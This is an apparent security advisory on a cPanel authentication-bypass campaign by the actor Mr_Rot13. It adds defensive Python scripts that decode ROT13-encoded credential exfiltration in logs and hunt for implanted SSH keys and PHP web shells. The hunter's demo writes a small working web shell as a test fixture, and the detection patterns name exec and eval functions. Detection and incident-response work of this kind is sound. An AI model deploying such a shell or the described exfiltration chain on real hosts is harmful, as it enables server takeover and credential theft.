Cybersecurity Alert: Exploitation of Critical cPanel Vulnerability by Threat Actor Mr_Rot13
A recent investigation has detailed activity by a threat actor tracked as Mr_Rot13, who has been exploiting a critical vulnerability in cPanel to deploy a backdoor named Filemanager. The flaw, tracked as CVE-2026-41940, affects both cPanel and WebHost Manager (WHM) and allows authentication bypass, giving remote attackers elevated control over the hosting environment and putting every website and service on an affected server at risk.
The situation escalated rapidly after the vulnerability was publicly disclosed late last month. A report from QiAnXin XLab notes that a range of actors have already begun exploiting the flaw for cryptocurrency mining, ransomware distribution, botnet recruitment, and backdoor installation. The report describes a sharp rise in activity: “Data monitoring indicates that over 2,000 attacker source IPs across the globe are currently involved in automated assaults and cybercrime initiatives targeting this vulnerability.” The most active source regions include Germany, the United States, Brazil, and the Netherlands.
To gain and keep persistent access to compromised systems, Mr_Rot13 and associates use a shell script that fetches a Go-based infector with either wget or curl from a remote server, “cp.dene.[de[.]com.” The infector implants an SSH public key on the compromised cPanel server, giving the attackers ongoing access that does not depend on the original vulnerability. Alongside the key implant, the script also drops a PHP web shell that handles file uploads and downloads and executes remote commands.
Once in place, the web shell becomes the hub of the attack chain. It injects JavaScript that serves a customized login page, which captures user credentials and relays them to an attacker-controlled server. The captured data is passed through ROT13, a trivial letter substitution that hides the plaintext from casual inspection but offers no cryptographic protection, before being sent to a domain, “wrned[.]com,” that is also tied to this activity.
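Because ROT13 is its own inverse, anything the injected page sends to the C2 host can be read back by simply applying ROT13 again. The following is an added example, not code from the XLab report: it scans constructed web-proxy log lines for POSTs to the domain named above, decodes the body, and flags submissions that contain credential fields. The log format, the field names and the sample lines are assumptions made for the demonstration.

```python
"""Decode ROT13-obfuscated credential posts to the C2 domain in egress logs.

Added example, not code from the XLab report. The log line format, the
credential field names and the sample lines below are constructed.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# The domain named in the report, un-defanged so hostnames can be matched.
C2_DOMAINS = {"wrned.com"}

# Constructed log format: "<timestamp> <client_ip> <method> <url> [<body>]".
LOG_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(GET|POST)\s+(\S+)\s*(.*)$")

# Field names that mark a decoded body as a credential submission (assumption).
CRED_KEYS = {"user", "username", "login", "pass", "password", "passwd", "pwd"}


def rot13(s: str) -> str:
    """Shift ASCII letters by 13 places; digits and punctuation pass through."""
    out = []
    for ch in s:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + 13) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + 13) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def decode_exfil(lines, c2_domains=C2_DOMAINS) -> list:
    """Return decoded credential submissions sent to a C2 domain."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ts, client, method, url, body = m.groups()
        parts = urlsplit(url)
        host = parts.hostname or ""
        if host not in c2_domains and not host.endswith(
                tuple("." + d for d in c2_domains)):
            continue
        # ROT13 leaves '&' and '=' untouched, so the decoded text is still a
        # query string; applying ROT13 once more restores the plaintext.
        decoded = rot13(body if method == "POST" else parts.query)
        fields = dict(parse_qsl(decoded, keep_blank_values=True))
        if CRED_KEYS & {k.lower() for k in fields}:
            findings.append({"time": ts, "client": client, "host": host,
                             "fields": fields})
    return findings


# Constructed sample: a benign request to the hosted site, then two
# ROT13-encoded credential posts to the C2 domain.
SAMPLE_LOG = [
    "2026-05-02T10:14:03Z 198.51.100.7 GET https://www.example.com/cpanel/login.html",
    "2026-05-02T10:14:09Z 198.51.100.7 POST https://wrned.com/api/save hfre=nqzva&cnff=Uhagre2",
    "2026-05-02T10:15:40Z 203.0.113.9 POST https://wrned.com/api/save hfre=ebbg&cnff=Fhzzre!2026",
]

if __name__ == "__main__":
    for f in decode_exfil(SAMPLE_LOG):
        print(f["time"], f["client"], "->", f["host"], f["fields"])
```

Run against real proxy or WAF logs, the decoded fields tell you which accounts were phished through the injected page and therefore need their passwords rotated; the client IPs are the victims, not the attacker.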
The infector is not limited to planting the key; it also harvests sensitive information from the host. Bash history, SSH credentials, device details, database passwords, and cPanel virtual aliases are sent to a Telegram group run by a user identified as “0xWR.” This automated collection pipeline further illustrates how organized the operation is.
Filemanager, one of the main backdoors in use, is delivered by a second shell script retrieved from the domain “wpsock[.]com.” It gives the attacker file management functions, remote command execution, and an interactive shell, widening the breach and deepening control over the compromised system.
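The two persistence artefacts described above (the implanted SSH key in the earlier paragraph, and the PHP web shell and Filemanager backdoor that pair attacker-controlled input with file upload or command execution) can be hunted for directly on disk. The following is an added example, not code from the XLab report or from cPanel: it fingerprints every entry in the authorized_keys files under a given root against an allowlist, and flags PHP files whose source combines request input with upload handling, command execution or eval. The directory layout, the allowlist and the sample files are constructed for the demonstration.

```python
"""Hunt for an unexpected SSH key and a PHP web shell under a cPanel home tree.

Added example, not code from the XLab report or from cPanel. The allowlist,
directory layout and sample files are constructed for the demonstration.
"""
import base64
import hashlib
import re
import tempfile
from pathlib import Path

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def ssh_fingerprint(blob_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64-encoded key blob."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> list:
    """One dict per key line; options before the key type are tolerated."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        tokens = raw.strip().split()
        if not tokens or tokens[0].startswith("#"):
            continue
        for i, tok in enumerate(tokens):
            if tok in KEY_TYPES and i + 1 < len(tokens):
                try:
                    fp = ssh_fingerprint(tokens[i + 1])
                except ValueError:          # binascii.Error subclasses ValueError
                    fp = "invalid-blob"
                entries.append({"line": lineno, "type": tok, "fingerprint": fp,
                                "comment": " ".join(tokens[i + 2:])})
                break
    return entries


def unexpected_keys(text: str, known_fingerprints: set) -> list:
    return [e for e in parse_authorized_keys(text)
            if e["fingerprint"] not in known_fingerprints]


# Each pattern is one capability a web shell needs. Request input combined
# with upload handling, command execution or eval is the pairing to review.
PHP_INDICATORS = {
    "request_input": re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    "upload": re.compile(r"\$_FILES\b|\bmove_uploaded_file\s*\("),
    "exec": re.compile(r"\b(?:shell_exec|system|passthru|exec|popen|proc_open)\s*\("),
    "dynamic_eval": re.compile(r"\beval\s*\(|\bcreate_function\s*\("),
    "obfuscation": re.compile(r"\b(?:base64_decode|gzinflate|str_rot13)\s*\("),
}


def php_indicators(source: str) -> set:
    return {name for name, rx in PHP_INDICATORS.items() if rx.search(source)}


def is_likely_webshell(source: str) -> bool:
    hits = php_indicators(source)
    return "request_input" in hits and bool(hits & {"exec", "dynamic_eval", "upload"})


def scan_host(root: Path, known_fingerprints: set) -> dict:
    """Walk a filesystem root (for example /home on a real host) for both artefacts."""
    findings = {"unexpected_keys": [], "webshells": []}
    for ak in root.rglob("authorized_keys"):
        for e in unexpected_keys(ak.read_text(errors="replace"), known_fingerprints):
            e["file"] = str(ak)
            findings["unexpected_keys"].append(e)
    for php in root.rglob("*.php"):
        src = php.read_text(errors="replace")
        if is_likely_webshell(src):
            findings["webshells"].append({"file": str(php),
                                          "indicators": sorted(php_indicators(src))})
    return findings


def demo() -> dict:
    """Build a constructed account tree in a temp dir and scan it."""
    known_blob = base64.b64encode(b"constructed blob of a key the team deployed").decode()
    rogue_blob = base64.b64encode(b"constructed blob of a key nobody recognises").decode()
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        ssh = root / "acct1" / ".ssh"
        ssh.mkdir(parents=True)
        (ssh / "authorized_keys").write_text(
            f"ssh-ed25519 {known_blob} ops@example\n"
            f'command="/bin/true" ssh-rsa {rogue_blob} unknown@example\n')
        web = root / "acct1" / "public_html"
        (web / "images").mkdir(parents=True)
        (web / "index.php").write_text(          # benign: input but no execution
            "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>")
        (web / "images" / ".cache.php").write_text(   # upload + command execution
            "<?php if(isset($_FILES['f'])){move_uploaded_file($_FILES['f']['tmp_name'],$_POST['p']);}"
            "if(isset($_POST['c'])){echo shell_exec($_POST['c']);} ?>")
        return scan_host(root, {ssh_fingerprint(known_blob)})


if __name__ == "__main__":
    print(demo())
```

On a real cPanel host, point `scan_host` at both /home and /root, since the attacker may implant the key for root as well as for an account; compare fingerprints with `ssh-keygen -lf` output rather than trusting the comment field, which the attacker controls.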
Analysis suggests that Mr_Rot13 has operated quietly for several years. The C2 domain embedded in the injected JavaScript has long been used by a PHP backdoor named “helper.php,” which was seen on VirusTotal as early as April 2022; the domain itself was registered in October 2020.
According to XLab, detection of samples and infrastructure linked to Mr_Rot13 remains disproportionately low across security products, which raises questions about how well existing defenses cope with the actor's tactics. Roughly six years of activity since 2020 with little coverage points to a gap in the threat landscape and to the need for closer vigilance around hosting infrastructure.
Organizations running cPanel or WHM should apply the vendor fix for CVE-2026-41940 without delay and then assume exposure rather than clean state: review authorized_keys files for entries nobody can account for, sweep account web roots for recently added or modified PHP files, check egress logs for connections to the domains named above and to Telegram's API, and rotate any credentials that were stored on or entered through the affected servers. Campaigns like this one reward a layered approach that combines timely patching, user awareness, and continuous monitoring rather than any single control.

